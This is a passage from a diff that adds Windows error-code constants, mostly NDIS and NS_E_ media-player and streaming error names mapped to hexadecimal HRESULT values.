+ERROR_NDIS_RESOURCE_CONFLICT = 0x8034001E
+ERROR_NDIS_MEDIA_DISCONNECTED = 0x8034001F
+ERROR_NDIS_INVALID_ADDRESS = 0x80340022
+ERROR_NDIS_PAUSED = 0x8034002A
+ERROR_NDIS_INTERFACE_NOT_FOUND = 0x8034002B
+ERROR_NDIS_UNSUPPORTED_REVISION = 0x8034002C
+ERROR_NDIS_INVALID_PORT = 0x8034002D
+ERROR_NDIS_INVALID_PORT_STATE = 0x8034002E
+ERROR_NDIS_NOT_SUPPORTED = 0x803400BB
+ERROR_NDIS_DOT11_AUTO_CONFIG_ENABLED = 0x80342000
+ERROR_NDIS_DOT11_MEDIA_IN_USE = 0x80342001
+ERROR_NDIS_DOT11_POWER_STATE_INVALID = 0x80342002
+TRK_E_NOT_FOUND = 0x8DEAD01B
+TRK_E_VOLUME_QUOTA_EXCEEDED = 0x8DEAD01C
+TRK_SERVER_TOO_BUSY = 0x8DEAD01E
+ERROR_AUDITING_DISABLED = 0xC0090001
+ERROR_ALL_SIDS_FILTERED = 0xC0090002
+ERROR_BIZRULES_NOT_ENABLED = 0xC0090003
+NS_E_NOCONNECTION = 0xC00D0005
+NS_E_CANNOTCONNECT = 0xC00D0006
+NS_E_CANNOTDESTROYTITLE = 0xC00D0007
+NS_E_CANNOTRENAMETITLE = 0xC00D0008
+NS_E_CANNOTOFFLINEDISK = 0xC00D0009
+NS_E_CANNOTONLINEDISK = 0xC00D000A
+NS_E_NOREGISTEREDWALKER = 0xC00D000B
+NS_E_NOFUNNEL = 0xC00D000C
+NS_E_NO_LOCALPLAY = 0xC00D000D
+NS_E_NETWORK_BUSY = 0xC00D000E
+NS_E_TOO_MANY_SESS = 0xC00D000F
+NS_E_ALREADY_CONNECTED = 0xC00D0010
+NS_E_INVALID_INDEX = 0xC00D0011
+NS_E_PROTOCOL_MISMATCH = 0xC00D0012
+NS_E_TIMEOUT = 0xC00D0013
+NS_E_NET_WRITE = 0xC00D0014
+NS_E_NET_READ = 0xC00D0015
+NS_E_DISK_WRITE = 0xC00D0016
+NS_E_DISK_READ = 0xC00D0017
+NS_E_FILE_WRITE = 0xC00D0018
+NS_E_FILE_READ = 0xC00D0019
+NS_E_FILE_NOT_FOUND = 0xC00D001A
+NS_E_FILE_EXISTS = 0xC00D001B
+NS_E_INVALID_NAME = 0xC00D001C
+NS_E_FILE_OPEN_FAILED = 0xC00D001D
+NS_E_FILE_ALLOCATION_FAILED = 0xC00D001E
+NS_E_FILE_INIT_FAILED = 0xC00D001F
+NS_E_FILE_PLAY_FAILED = 0xC00D0020
+NS_E_SET_DISK_UID_FAILED = 0xC00D0021
+NS_E_INDUCED = 0xC00D0022
+NS_E_CCLINK_DOWN = 0xC00D0023
+NS_E_INTERNAL = 0xC00D0024
+NS_E_BUSY = 0xC00D0025
+NS_E_UNRECOGNIZED_STREAM_TYPE = 0xC00D0026
+NS_E_NETWORK_SERVICE_FAILURE = 0xC00D0027
+NS_E_NETWORK_RESOURCE_FAILURE = 0xC00D0028
+NS_E_CONNECTION_FAILURE = 0xC00D0029
+NS_E_SHUTDOWN = 0xC00D002A
+NS_E_INVALID_REQUEST = 0xC00D002B
+NS_E_INSUFFICIENT_BANDWIDTH = 0xC00D002C
+NS_E_NOT_REBUILDING = 0xC00D002D
+NS_E_LATE_OPERATION = 0xC00D002E
+NS_E_INVALID_DATA = 0xC00D002F
+NS_E_FILE_BANDWIDTH_LIMIT = 0xC00D0030
+NS_E_OPEN_FILE_LIMIT = 0xC00D0031
+NS_E_BAD_CONTROL_DATA = 0xC00D0032
+NS_E_NO_STREAM = 0xC00D0033
+NS_E_STREAM_END = 0xC00D0034
+NS_E_SERVER_NOT_FOUND = 0xC00D0035
+NS_E_DUPLICATE_NAME = 0xC00D0036
+NS_E_DUPLICATE_ADDRESS = 0xC00D0037
+NS_E_BAD_MULTICAST_ADDRESS = 0xC00D0038
+NS_E_BAD_ADAPTER_ADDRESS = 0xC00D0039
+NS_E_BAD_DELIVERY_MODE = 0xC00D003A
+NS_E_INVALID_CHANNEL = 0xC00D003B
+NS_E_INVALID_STREAM = 0xC00D003C
+NS_E_INVALID_ARCHIVE = 0xC00D003D
+NS_E_NOTITLES = 0xC00D003E
+NS_E_INVALID_CLIENT = 0xC00D003F
+NS_E_INVALID_BLACKHOLE_ADDRESS = 0xC00D0040
+NS_E_INCOMPATIBLE_FORMAT = 0xC00D0041
+NS_E_INVALID_KEY = 0xC00D0042
+NS_E_INVALID_PORT = 0xC00D0043
+NS_E_INVALID_TTL = 0xC00D0044
+NS_E_STRIDE_REFUSED = 0xC00D0045
+NS_E_MMSAUTOSERVER_CANTFINDWALKER = 0xC00D0046
+NS_E_MAX_BITRATE = 0xC00D0047
+NS_E_LOGFILEPERIOD = 0xC00D0048
+NS_E_MAX_CLIENTS = 0xC00D0049
+NS_E_LOG_FILE_SIZE = 0xC00D004A
+NS_E_MAX_FILERATE = 0xC00D004B
+NS_E_WALKER_UNKNOWN = 0xC00D004C
+NS_E_WALKER_SERVER = 0xC00D004D
+NS_E_WALKER_USAGE = 0xC00D004E
+NS_E_TIGER_FAIL = 0xC00D0050
+NS_E_CUB_FAIL = 0xC00D0053
+NS_E_DISK_FAIL = 0xC00D0055
+NS_E_MAX_FUNNELS_ALERT = 0xC00D0060
+NS_E_ALLOCATE_FILE_FAIL = 0xC00D0061
+NS_E_PAGING_ERROR = 0xC00D0062
+NS_E_BAD_BLOCK0_VERSION = 0xC00D0063
+NS_E_BAD_DISK_UID = 0xC00D0064
+NS_E_BAD_FSMAJOR_VERSION = 0xC00D0065
+NS_E_BAD_STAMPNUMBER = 0xC00D0066
+NS_E_PARTIALLY_REBUILT_DISK = 0xC00D0067
+NS_E_ENACTPLAN_GIVEUP = 0xC00D0068
+MCMADM_E_REGKEY_NOT_FOUND = 0xC00D006A
+NS_E_NO_FORMATS = 0xC00D006B
+NS_E_NO_REFERENCES = 0xC00D006C
+NS_E_WAVE_OPEN = 0xC00D006D
+NS_E_CANNOTCONNECTEVENTS = 0xC00D006F
+NS_E_NO_DEVICE = 0xC00D0071
+NS_E_NO_SPECIFIED_DEVICE = 0xC00D0072
+NS_E_MONITOR_GIVEUP = 0xC00D00C8
+NS_E_REMIRRORED_DISK = 0xC00D00C9
+NS_E_INSUFFICIENT_DATA = 0xC00D00CA
+NS_E_ASSERT = 0xC00D00CB
+NS_E_BAD_ADAPTER_NAME = 0xC00D00CC
+NS_E_NOT_LICENSED = 0xC00D00CD
+NS_E_NO_SERVER_CONTACT = 0xC00D00CE
+NS_E_TOO_MANY_TITLES = 0xC00D00CF
+NS_E_TITLE_SIZE_EXCEEDED = 0xC00D00D0
+NS_E_UDP_DISABLED = 0xC00D00D1
+NS_E_TCP_DISABLED = 0xC00D00D2
+NS_E_HTTP_DISABLED = 0xC00D00D3
+NS_E_LICENSE_EXPIRED = 0xC00D00D4
+NS_E_TITLE_BITRATE = 0xC00D00D5
+NS_E_EMPTY_PROGRAM_NAME = 0xC00D00D6
+NS_E_MISSING_CHANNEL = 0xC00D00D7
+NS_E_NO_CHANNELS = 0xC00D00D8
+NS_E_INVALID_INDEX2 = 0xC00D00D9
+NS_E_CUB_FAIL_LINK = 0xC00D0190
+NS_E_BAD_CUB_UID = 0xC00D0192
+NS_E_GLITCH_MODE = 0xC00D0195
+NS_E_NO_MEDIA_PROTOCOL = 0xC00D019B
+NS_E_NOTHING_TO_DO = 0xC00D07F1
+NS_E_NO_MULTICAST = 0xC00D07F2
+NS_E_INVALID_INPUT_FORMAT = 0xC00D0BB8
+NS_E_MSAUDIO_NOT_INSTALLED = 0xC00D0BB9
+NS_E_UNEXPECTED_MSAUDIO_ERROR = 0xC00D0BBA
+NS_E_INVALID_OUTPUT_FORMAT = 0xC00D0BBB
+NS_E_NOT_CONFIGURED = 0xC00D0BBC
+NS_E_PROTECTED_CONTENT = 0xC00D0BBD
+NS_E_LICENSE_REQUIRED = 0xC00D0BBE
+NS_E_TAMPERED_CONTENT = 0xC00D0BBF
+NS_E_LICENSE_OUTOFDATE = 0xC00D0BC0
+NS_E_LICENSE_INCORRECT_RIGHTS = 0xC00D0BC1
+NS_E_AUDIO_CODEC_NOT_INSTALLED = 0xC00D0BC2
+NS_E_AUDIO_CODEC_ERROR = 0xC00D0BC3
+NS_E_VIDEO_CODEC_NOT_INSTALLED = 0xC00D0BC4
+NS_E_VIDEO_CODEC_ERROR = 0xC00D0BC5
+NS_E_INVALIDPROFILE = 0xC00D0BC6
+NS_E_INCOMPATIBLE_VERSION = 0xC00D0BC7
+NS_E_OFFLINE_MODE = 0xC00D0BCA
+NS_E_NOT_CONNECTED = 0xC00D0BCB
+NS_E_TOO_MUCH_DATA = 0xC00D0BCC
+NS_E_UNSUPPORTED_PROPERTY = 0xC00D0BCD
+NS_E_8BIT_WAVE_UNSUPPORTED = 0xC00D0BCE
+NS_E_NO_MORE_SAMPLES = 0xC00D0BCF
+NS_E_INVALID_SAMPLING_RATE = 0xC00D0BD0
+NS_E_MAX_PACKET_SIZE_TOO_SMALL = 0xC00D0BD1
+NS_E_LATE_PACKET = 0xC00D0BD2
+NS_E_DUPLICATE_PACKET = 0xC00D0BD3
+NS_E_SDK_BUFFERTOOSMALL = 0xC00D0BD4
+NS_E_INVALID_NUM_PASSES = 0xC00D0BD5
+NS_E_ATTRIBUTE_READ_ONLY = 0xC00D0BD6
+NS_E_ATTRIBUTE_NOT_ALLOWED = 0xC00D0BD7
+NS_E_INVALID_EDL = 0xC00D0BD8
+NS_E_DATA_UNIT_EXTENSION_TOO_LARGE = 0xC00D0BD9
+NS_E_CODEC_DMO_ERROR = 0xC00D0BDA
+NS_E_FEATURE_DISABLED_BY_GROUP_POLICY = 0xC00D0BDC
+NS_E_FEATURE_DISABLED_IN_SKU = 0xC00D0BDD
+NS_E_NO_CD = 0xC00D0FA0
+NS_E_CANT_READ_DIGITAL = 0xC00D0FA1
+NS_E_DEVICE_DISCONNECTED = 0xC00D0FA2
+NS_E_DEVICE_NOT_SUPPORT_FORMAT = 0xC00D0FA3
+NS_E_SLOW_READ_DIGITAL = 0xC00D0FA4
+NS_E_MIXER_INVALID_LINE = 0xC00D0FA5
+NS_E_MIXER_INVALID_CONTROL = 0xC00D0FA6
+NS_E_MIXER_INVALID_VALUE = 0xC00D0FA7
+NS_E_MIXER_UNKNOWN_MMRESULT = 0xC00D0FA8
+NS_E_USER_STOP = 0xC00D0FA9
+NS_E_MP3_FORMAT_NOT_FOUND = 0xC00D0FAA
+NS_E_CD_READ_ERROR_NO_CORRECTION = 0xC00D0FAB
+NS_E_CD_READ_ERROR = 0xC00D0FAC
+NS_E_CD_SLOW_COPY = 0xC00D0FAD
+NS_E_CD_COPYTO_CD = 0xC00D0FAE
+NS_E_MIXER_NODRIVER = 0xC00D0FAF
+NS_E_REDBOOK_ENABLED_WHILE_COPYING = 0xC00D0FB0
+NS_E_CD_REFRESH = 0xC00D0FB1
+NS_E_CD_DRIVER_PROBLEM = 0xC00D0FB2
+NS_E_WONT_DO_DIGITAL = 0xC00D0FB3
+NS_E_WMPXML_NOERROR = 0xC00D0FB4
+NS_E_WMPXML_ENDOFDATA = 0xC00D0FB5
+NS_E_WMPXML_PARSEERROR = 0xC00D0FB6
+NS_E_WMPXML_ATTRIBUTENOTFOUND = 0xC00D0FB7
+NS_E_WMPXML_PINOTFOUND = 0xC00D0FB8
+NS_E_WMPXML_EMPTYDOC = 0xC00D0FB9
+NS_E_WMP_PATH_ALREADY_IN_LIBRARY = 0xC00D0FBA
+NS_E_WMP_FILESCANALREADYSTARTED = 0xC00D0FBE
+NS_E_WMP_HME_INVALIDOBJECTID = 0xC00D0FBF
+NS_E_WMP_MF_CODE_EXPIRED = 0xC00D0FC0
+NS_E_WMP_HME_NOTSEARCHABLEFORITEMS = 0xC00D0FC1
+NS_E_WMP_ADDTOLIBRARY_FAILED = 0xC00D0FC7
+NS_E_WMP_WINDOWSAPIFAILURE = 0xC00D0FC8
+NS_E_WMP_RECORDING_NOT_ALLOWED = 0xC00D0FC9
+NS_E_DEVICE_NOT_READY = 0xC00D0FCA
+NS_E_DAMAGED_FILE = 0xC00D0FCB
+NS_E_MPDB_GENERIC = 0xC00D0FCC
+NS_E_FILE_FAILED_CHECKS = 0xC00D0FCD
+NS_E_MEDIA_LIBRARY_FAILED = 0xC00D0FCE
+NS_E_SHARING_VIOLATION = 0xC00D0FCF
+NS_E_NO_ERROR_STRING_FOUND = 0xC00D0FD0
+NS_E_WMPOCX_NO_REMOTE_CORE = 0xC00D0FD1
+NS_E_WMPOCX_NO_ACTIVE_CORE = 0xC00D0FD2
+NS_E_WMPOCX_NOT_RUNNING_REMOTELY = 0xC00D0FD3
+NS_E_WMPOCX_NO_REMOTE_WINDOW = 0xC00D0FD4
+NS_E_WMPOCX_ERRORMANAGERNOTAVAILABLE = 0xC00D0FD5
+NS_E_PLUGIN_NOTSHUTDOWN = 0xC00D0FD6
+NS_E_WMP_CANNOT_FIND_FOLDER = 0xC00D0FD7
+NS_E_WMP_STREAMING_RECORDING_NOT_ALLOWED = 0xC00D0FD8
+NS_E_WMP_PLUGINDLL_NOTFOUND = 0xC00D0FD9
+NS_E_NEED_TO_ASK_USER = 0xC00D0FDA
+NS_E_WMPOCX_PLAYER_NOT_DOCKED = 0xC00D0FDB
+NS_E_WMP_EXTERNAL_NOTREADY = 0xC00D0FDC
+NS_E_WMP_MLS_STALE_DATA = 0xC00D0FDD
+NS_E_WMP_UI_SUBCONTROLSNOTSUPPORTED = 0xC00D0FDE
+NS_E_WMP_UI_VERSIONMISMATCH = 0xC00D0FDF
+NS_E_WMP_UI_NOTATHEMEFILE = 0xC00D0FE0
+NS_E_WMP_UI_SUBELEMENTNOTFOUND = 0xC00D0FE1
+NS_E_WMP_UI_VERSIONPARSE = 0xC00D0FE2
+NS_E_WMP_UI_VIEWIDNOTFOUND = 0xC00D0FE3
+NS_E_WMP_UI_PASSTHROUGH = 0xC00D0FE4
+NS_E_WMP_UI_OBJECTNOTFOUND = 0xC00D0FE5
+NS_E_WMP_UI_SECONDHANDLER = 0xC00D0FE6
+NS_E_WMP_UI_NOSKININZIP = 0xC00D0FE7
+NS_E_WMP_URLDOWNLOADFAILED = 0xC00D0FEA
+NS_E_WMPOCX_UNABLE_TO_LOAD_SKIN = 0xC00D0FEB
+NS_E_WMP_INVALID_SKIN = 0xC00D0FEC
+NS_E_WMP_SENDMAILFAILED = 0xC00D0FED
+NS_E_WMP_LOCKEDINSKINMODE = 0xC00D0FEE
+NS_E_WMP_FAILED_TO_SAVE_FILE = 0xC00D0FEF
+NS_E_WMP_SAVEAS_READONLY = 0xC00D0FF0
+NS_E_WMP_FAILED_TO_SAVE_PLAYLIST = 0xC00D0FF1
+NS_E_WMP_FAILED_TO_OPEN_WMD = 0xC00D0FF2
+NS_E_WMP_CANT_PLAY_PROTECTED = 0xC00D0FF3
+NS_E_SHARING_STATE_OUT_OF_SYNC = 0xC00D0FF4
+NS_E_WMPOCX_REMOTE_PLAYER_ALREADY_RUNNING = 0xC00D0FFA
+NS_E_WMP_RBC_JPGMAPPINGIMAGE = 0xC00D1004
+NS_E_WMP_JPGTRANSPARENCY = 0xC00D1005
+NS_E_WMP_INVALID_MAX_VAL = 0xC00D1009
+NS_E_WMP_INVALID_MIN_VAL = 0xC00D100A
+NS_E_WMP_CS_JPGPOSITIONIMAGE = 0xC00D100E
+NS_E_WMP_CS_NOTEVENLYDIVISIBLE = 0xC00D100F
+NS_E_WMPZIP_NOTAZIPFILE = 0xC00D1018
+NS_E_WMPZIP_CORRUPT = 0xC00D1019
+NS_E_WMPZIP_FILENOTFOUND = 0xC00D101A
+NS_E_WMP_IMAGE_FILETYPE_UNSUPPORTED = 0xC00D1022
+NS_E_WMP_IMAGE_INVALID_FORMAT = 0xC00D1023
+NS_E_WMP_GIF_UNEXPECTED_ENDOFFILE = 0xC00D1024
+NS_E_WMP_GIF_INVALID_FORMAT = 0xC00D1025
+NS_E_WMP_GIF_BAD_VERSION_NUMBER = 0xC00D1026
+NS_E_WMP_GIF_NO_IMAGE_IN_FILE = 0xC00D1027
+NS_E_WMP_PNG_INVALIDFORMAT = 0xC00D1028
+NS_E_WMP_PNG_UNSUPPORTED_BITDEPTH = 0xC00D1029
+NS_E_WMP_PNG_UNSUPPORTED_COMPRESSION = 0xC00D102A
+NS_E_WMP_PNG_UNSUPPORTED_FILTER = 0xC00D102B
+NS_E_WMP_PNG_UNSUPPORTED_INTERLACE = 0xC00D102C
+NS_E_WMP_PNG_UNSUPPORTED_BAD_CRC = 0xC00D102D
+NS_E_WMP_BMP_INVALID_BITMASK = 0xC00D102E
+NS_E_WMP_BMP_TOPDOWN_DIB_UNSUPPORTED = 0xC00D102F
+NS_E_WMP_BMP_BITMAP_NOT_CREATED = 0xC00D1030
+NS_E_WMP_BMP_COMPRESSION_UNSUPPORTED = 0xC00D1031
+NS_E_WMP_BMP_INVALID_FORMAT = 0xC00D1032
+NS_E_WMP_JPG_JERR_ARITHCODING_NOTIMPL = 0xC00D1033
+NS_E_WMP_JPG_INVALID_FORMAT = 0xC00D1034
+NS_E_WMP_JPG_BAD_DCTSIZE = 0xC00D1035
+NS_E_WMP_JPG_BAD_VERSION_NUMBER = 0xC00D1036
+NS_E_WMP_JPG_BAD_PRECISION = 0xC00D1037
+NS_E_WMP_JPG_CCIR601_NOTIMPL = 0xC00D1038
+NS_E_WMP_JPG_NO_IMAGE_IN_FILE = 0xC00D1039
+NS_E_WMP_JPG_READ_ERROR = 0xC00D103A
+NS_E_WMP_JPG_FRACT_SAMPLE_NOTIMPL = 0xC00D103B
+NS_E_WMP_JPG_IMAGE_TOO_BIG = 0xC00D103C
+NS_E_WMP_JPG_UNEXPECTED_ENDOFFILE = 0xC00D103D
+NS_E_WMP_JPG_SOF_UNSUPPORTED = 0xC00D103E
+NS_E_WMP_JPG_UNKNOWN_MARKER = 0xC00D103F
+NS_E_WMP_FAILED_TO_OPEN_IMAGE = 0xC00D1044
+NS_E_WMP_DAI_SONGTOOSHORT = 0xC00D1049
+NS_E_WMG_RATEUNAVAILABLE = 0xC00D104A
+NS_E_WMG_PLUGINUNAVAILABLE = 0xC00D104B
+NS_E_WMG_CANNOTQUEUE = 0xC00D104C
+NS_E_WMG_PREROLLLICENSEACQUISITIONNOTALLOWED = 0xC00D104D
+NS_E_WMG_UNEXPECTEDPREROLLSTATUS = 0xC00D104E
+NS_E_WMG_INVALID_COPP_CERTIFICATE = 0xC00D1051
+NS_E_WMG_COPP_SECURITY_INVALID = 0xC00D1052
+NS_E_WMG_COPP_UNSUPPORTED = 0xC00D1053
+NS_E_WMG_INVALIDSTATE = 0xC00D1054
+NS_E_WMG_SINKALREADYEXISTS = 0xC00D1055
+NS_E_WMG_NOSDKINTERFACE = 0xC00D1056
+NS_E_WMG_NOTALLOUTPUTSRENDERED = 0xC00D1057
+NS_E_WMG_FILETRANSFERNOTALLOWED = 0xC00D1058
+NS_E_WMR_UNSUPPORTEDSTREAM = 0xC00D1059
+NS_E_WMR_PINNOTFOUND = 0xC00D105A
+NS_E_WMR_WAITINGONFORMATSWITCH = 0xC00D105B
+NS_E_WMR_NOSOURCEFILTER = 0xC00D105C
+NS_E_WMR_PINTYPENOMATCH = 0xC00D105D
+NS_E_WMR_NOCALLBACKAVAILABLE = 0xC00D105E
+NS_E_WMR_SAMPLEPROPERTYNOTSET = 0xC00D1062
+NS_E_WMR_CANNOT_RENDER_BINARY_STREAM = 0xC00D1063
+NS_E_WMG_LICENSE_TAMPERED = 0xC00D1064
+NS_E_WMR_WILLNOT_RENDER_BINARY_STREAM = 0xC00D1065
+NS_E_WMX_UNRECOGNIZED_PLAYLIST_FORMAT = 0xC00D1068
+NS_E_ASX_INVALIDFORMAT = 0xC00D1069
+NS_E_ASX_INVALIDVERSION = 0xC00D106A
+NS_E_ASX_INVALID_REPEAT_BLOCK = 0xC00D106B
+NS_E_ASX_NOTHING_TO_WRITE = 0xC00D106C
+NS_E_URLLIST_INVALIDFORMAT = 0xC00D106D
+NS_E_WMX_ATTRIBUTE_DOES_NOT_EXIST = 0xC00D106E
+NS_E_WMX_ATTRIBUTE_ALREADY_EXISTS = 0xC00D106F
+NS_E_WMX_ATTRIBUTE_UNRETRIEVABLE = 0xC00D1070
+NS_E_WMX_ITEM_DOES_NOT_EXIST = 0xC00D1071
+NS_E_WMX_ITEM_TYPE_ILLEGAL = 0xC00D1072
+NS_E_WMX_ITEM_UNSETTABLE = 0xC00D1073
+NS_E_WMX_PLAYLIST_EMPTY = 0xC00D1074
+NS_E_MLS_SMARTPLAYLIST_FILTER_NOT_REGISTERED = 0xC00D1075
+NS_E_WMX_INVALID_FORMAT_OVER_NESTING = 0xC00D1076
+NS_E_WMPCORE_NOSOURCEURLSTRING = 0xC00D107C
+NS_E_WMPCORE_COCREATEFAILEDFORGITOBJECT = 0xC00D107D
+NS_E_WMPCORE_FAILEDTOGETMARSHALLEDEVENTHANDLERINTERFACE = 0xC00D107E
+NS_E_WMPCORE_BUFFERTOOSMALL = 0xC00D107F
+NS_E_WMPCORE_UNAVAILABLE = 0xC00D1080
+NS_E_WMPCORE_INVALIDPLAYLISTMODE = 0xC00D1081
+NS_E_WMPCORE_ITEMNOTINPLAYLIST = 0xC00D1086
+NS_E_WMPCORE_PLAYLISTEMPTY = 0xC00D1087
+NS_E_WMPCORE_NOBROWSER = 0xC00D1088
+NS_E_WMPCORE_UNRECOGNIZED_MEDIA_URL = 0xC00D1089
+NS_E_WMPCORE_GRAPH_NOT_IN_LIST = 0xC00D108A
+NS_E_WMPCORE_PLAYLIST_EMPTY_OR_SINGLE_MEDIA = 0xC00D108B
+NS_E_WMPCORE_ERRORSINKNOTREGISTERED = 0xC00D108C
+NS_E_WMPCORE_ERRORMANAGERNOTAVAILABLE = 0xC00D108D
+NS_E_WMPCORE_WEBHELPFAILED = 0xC00D108E
+NS_E_WMPCORE_MEDIA_ERROR_RESUME_FAILED = 0xC00D108F
+NS_E_WMPCORE_NO_REF_IN_ENTRY = 0xC00D1090
+NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_NAME_EMPTY = 0xC00D1091
+NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_NAME_ILLEGAL = 0xC00D1092
+NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_VALUE_EMPTY = 0xC00D1093
+NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_VALUE_ILLEGAL = 0xC00D1094
+NS_E_WMPCORE_WMX_LIST_ITEM_ATTRIBUTE_NAME_EMPTY = 0xC00D1095
+NS_E_WMPCORE_WMX_LIST_ITEM_ATTRIBUTE_NAME_ILLEGAL = 0xC00D1096
+NS_E_WMPCORE_WMX_LIST_ITEM_ATTRIBUTE_VALUE_EMPTY = 0xC00D1097
+NS_E_WMPCORE_LIST_ENTRY_NO_REF = 0xC00D1098
+NS_E_WMPCORE_MISNAMED_FILE = 0xC00D1099
+NS_E_WMPCORE_CODEC_NOT_TRUSTED = 0xC00D109A
+NS_E_WMPCORE_CODEC_NOT_FOUND = 0xC00D109B
+NS_E_WMPCORE_CODEC_DOWNLOAD_NOT_ALLOWED = 0xC00D109C
+NS_E_WMPCORE_ERROR_DOWNLOADING_PLAYLIST = 0xC00D109D
+NS_E_WMPCORE_FAILED_TO_BUILD_PLAYLIST = 0xC00D109E
+NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_NONE = 0xC00D109F
+NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_EXHAUSTED = 0xC00D10A0
+NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_NAME_NOT_FOUND = 0xC00D10A1
+NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_MORPH_FAILED = 0xC00D10A2
+NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_INIT_FAILED = 0xC00D10A3
+NS_E_WMPCORE_MEDIA_ALTERNATE_REF_EMPTY = 0xC00D10A4
+NS_E_WMPCORE_PLAYLIST_NO_EVENT_NAME = 0xC00D10A5
+NS_E_WMPCORE_PLAYLIST_EVENT_ATTRIBUTE_ABSENT = 0xC00D10A6
+NS_E_WMPCORE_PLAYLIST_EVENT_EMPTY = 0xC00D10A7
+NS_E_WMPCORE_PLAYLIST_STACK_EMPTY = 0xC00D10A8
+NS_E_WMPCORE_CURRENT_MEDIA_NOT_ACTIVE = 0xC00D10A9
+NS_E_WMPCORE_USER_CANCEL = 0xC00D10AB
+NS_E_WMPCORE_PLAYLIST_REPEAT_EMPTY = 0xC00D10AC
+NS_E_WMPCORE_PLAYLIST_REPEAT_START_MEDIA_NONE = 0xC00D10AD
+NS_E_WMPCORE_PLAYLIST_REPEAT_END_MEDIA_NONE = 0xC00D10AE
+NS_E_WMPCORE_INVALID_PLAYLIST_URL = 0xC00D10AF
+NS_E_WMPCORE_MISMATCHED_RUNTIME = 0xC00D10B0
+NS_E_WMPCORE_PLAYLIST_IMPORT_FAILED_NO_ITEMS = 0xC00D10B1
+NS_E_WMPCORE_VIDEO_TRANSFORM_FILTER_INSERTION = 0xC00D10B2
+NS_E_WMPCORE_MEDIA_UNAVAILABLE = 0xC00D10B3
+NS_E_WMPCORE_WMX_ENTRYREF_NO_REF = 0xC00D10B4
+NS_E_WMPCORE_NO_PLAYABLE_MEDIA_IN_PLAYLIST = 0xC00D10B5
+NS_E_WMPCORE_PLAYLIST_EMPTY_NESTED_PLAYLIST_SKIPPED_ITEMS = 0xC00D10B6
+NS_E_WMPCORE_BUSY = 0xC00D10B7
+NS_E_WMPCORE_MEDIA_CHILD_PLAYLIST_UNAVAILABLE = 0xC00D10B8
+NS_E_WMPCORE_MEDIA_NO_CHILD_PLAYLIST = 0xC00D10B9
+NS_E_WMPCORE_FILE_NOT_FOUND = 0xC00D10BA
+NS_E_WMPCORE_TEMP_FILE_NOT_FOUND = 0xC00D10BB
+NS_E_WMDM_REVOKED = 0xC00D10BC
+NS_E_DDRAW_GENERIC = 0xC00D10BD
+NS_E_DISPLAY_MODE_CHANGE_FAILED = 0xC00D10BE
+NS_E_PLAYLIST_CONTAINS_ERRORS = 0xC00D10BF
+NS_E_CHANGING_PROXY_NAME = 0xC00D10C0
+NS_E_CHANGING_PROXY_PORT = 0xC00D10C1
+NS_E_CHANGING_PROXY_EXCEPTIONLIST = 0xC00D10C2
+NS_E_CHANGING_PROXYBYPASS = 0xC00D10C3
+NS_E_CHANGING_PROXY_PROTOCOL_NOT_FOUND = 0xC00D10C4
+NS_E_GRAPH_NOAUDIOLANGUAGE = 0xC00D10C5
+NS_E_GRAPH_NOAUDIOLANGUAGESELECTED = 0xC00D10C6
+NS_E_CORECD_NOTAMEDIACD = 0xC00D10C7
+NS_E_WMPCORE_MEDIA_URL_TOO_LONG = 0xC00D10C8
+NS_E_WMPFLASH_CANT_FIND_COM_SERVER = 0xC00D10C9
+NS_E_WMPFLASH_INCOMPATIBLEVERSION = 0xC00D10CA
+NS_E_WMPOCXGRAPH_IE_DISALLOWS_ACTIVEX_CONTROLS = 0xC00D10CB
+NS_E_NEED_CORE_REFERENCE = 0xC00D10CC
+NS_E_MEDIACD_READ_ERROR = 0xC00D10CD
+NS_E_IE_DISALLOWS_ACTIVEX_CONTROLS = 0xC00D10CE
+NS_E_FLASH_PLAYBACK_NOT_ALLOWED = 0xC00D10CF
+NS_E_UNABLE_TO_CREATE_RIP_LOCATION = 0xC00D10D0
+NS_E_WMPCORE_SOME_CODECS_MISSING = 0xC00D10D1
+NS_E_WMP_RIP_FAILED = 0xC00D10D2
+NS_E_WMP_FAILED_TO_RIP_TRACK = 0xC00D10D3
+NS_E_WMP_ERASE_FAILED = 0xC00D10D4
+NS_E_WMP_FORMAT_FAILED = 0xC00D10D5
+NS_E_WMP_CANNOT_BURN_NON_LOCAL_FILE = 0xC00D10D6
+NS_E_WMP_FILE_TYPE_CANNOT_BURN_TO_AUDIO_CD = 0xC00D10D7
+NS_E_WMP_FILE_DOES_NOT_FIT_ON_CD = 0xC00D10D8
+NS_E_WMP_FILE_NO_DURATION = 0xC00D10D9
+NS_E_PDA_FAILED_TO_BURN = 0xC00D10DA
+NS_E_FAILED_DOWNLOAD_ABORT_BURN = 0xC00D10DC
+NS_E_WMPCORE_DEVICE_DRIVERS_MISSING = 0xC00D10DD
+NS_E_WMPIM_USEROFFLINE = 0xC00D1126
+NS_E_WMPIM_USERCANCELED = 0xC00D1127
+NS_E_WMPIM_DIALUPFAILED = 0xC00D1128
+NS_E_WINSOCK_ERROR_STRING = 0xC00D1129
+NS_E_WMPBR_NOLISTENER = 0xC00D1130
+NS_E_WMPBR_BACKUPCANCEL = 0xC00D1131
+NS_E_WMPBR_RESTORECANCEL = 0xC00D1132
+NS_E_WMPBR_ERRORWITHURL = 0xC00D1133
+NS_E_WMPBR_NAMECOLLISION = 0xC00D1134
+NS_E_WMPBR_DRIVE_INVALID = 0xC00D1137
+NS_E_WMPBR_BACKUPRESTOREFAILED = 0xC00D1138
+NS_E_WMP_CONVERT_FILE_FAILED = 0xC00D1158
+NS_E_WMP_CONVERT_NO_RIGHTS_ERRORURL = 0xC00D1159
+NS_E_WMP_CONVERT_NO_RIGHTS_NOERRORURL = 0xC00D115A
+NS_E_WMP_CONVERT_FILE_CORRUPT = 0xC00D115B
+NS_E_WMP_CONVERT_PLUGIN_UNAVAILABLE_ERRORURL = 0xC00D115C
+NS_E_WMP_CONVERT_PLUGIN_UNAVAILABLE_NOERRORURL = 0xC00D115D
+NS_E_WMP_CONVERT_PLUGIN_UNKNOWN_FILE_OWNER = 0xC00D115E
+NS_E_DVD_DISC_COPY_PROTECT_OUTPUT_NS = 0xC00D1160
